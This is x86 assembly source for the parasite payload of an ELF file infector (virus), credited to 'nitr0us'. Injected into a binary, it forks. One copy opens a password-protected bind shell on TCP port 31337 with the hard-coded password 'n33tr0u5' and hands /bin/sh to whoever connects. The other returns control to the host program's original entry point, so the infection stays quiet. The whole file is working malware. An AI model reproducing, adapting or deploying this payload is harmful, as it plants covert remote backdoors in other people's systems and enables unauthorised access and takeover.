# Parasite used in elf_infector.c
#
# nitr0us

.section .text
.globl	main
main:
	pushf
	pusha

	# fork() functionality by nitr0us
	xorl	%eax, %eax
	add	$0x2, %eax
	int	$0x80
	test	%eax, %eax
	jnz	return_to_ep

	# linux-x86-authportbind by Gotfault Security
	# modz by nitr0us:
	# PORT = 31337
	# PASSWORD = n33tr0u5
	pushl	$0x66
	popl	%eax
	pushl	$0x1
	popl	%ebx
	cltd
	pushl	%edx
	pushl	%ebx
	pushl	$0x2
	movl	%esp, %ecx
	int	$0x80

	pushl	%edx
	pushw	$0x697a
	pushw	$0x2
	movl	%esp, %ecx
	pushl	$0x10
	pushl	%ecx
	pushl	%eax
	movl	%esp, %ecx
	movl	%eax, %esi
	incl	%ebx
	movb	$0x66, %al
	int	$0x80

	movb	$0x66, %al
	shl	%ebx
	int	$0x80

	pushl	%edx
	pushl	%edx
	pushl	%esi
	movl	%esp, %ecx
	incl	%ebx
	movb	$0x66, %al
	int	$0x80

	xchgl	%eax, %esi

	pushl	%edx
	pushl	$0x203a6472
	pushl	$0x6f777373
	pushw	$0x6150
	movl	%esp, %edi
	pushl	$0xa
	pushl	%edi
	pushl	%esi
	movl	%esp, %ecx
	movb	$0x9, %bl
	movb	$0x66, %al
	int	$0x80

	pushl	%edx
	pushl	$0x8
	leal	0x8(%esp), %ecx
	pushl	%ecx
	pushl	%esi
	movl	%esp, %ecx
	movb	$0xa, %bl
	movb	$0x66, %al
	int	$0x80

	xchgl	%esi, %ebx

	pushl	%edx
	pushl	$0x35753072
	pushl	$0x7433336e
	movl	%esp, %edi
	leal	0x1c(%esp), %esi
	movl	%edx, %ecx
	addb	$0x8, %cl
	cld
	repz	cmpsb	%es:(%edi), %ds:(%esi)
	je	dup

	divl	%eax
	int	$0x80

dup:
	pushl	$0x2
	popl	%ecx

dup_loop:
	movb	$0x3f, %al
	int	$0x80
	decl	%ecx
	jns	dup_loop

	pushl	$0xb
	popl	%eax
	pushl	%edx
	pushl	$0x68732f2f
	pushl	$0x6e69622f
	movl	%esp, %ebx
	pushl	%edx
	pushl	%ebx
	movl	%esp, %ecx
	int	$0x80

	xorl	%eax, %eax
	incb	%al
	int	$0x80

	# Extra c0de for ELF infection purposes...
return_to_ep:
	popa
	popf

	movl	$0xdefaced, %ebp
	jmp	*%ebp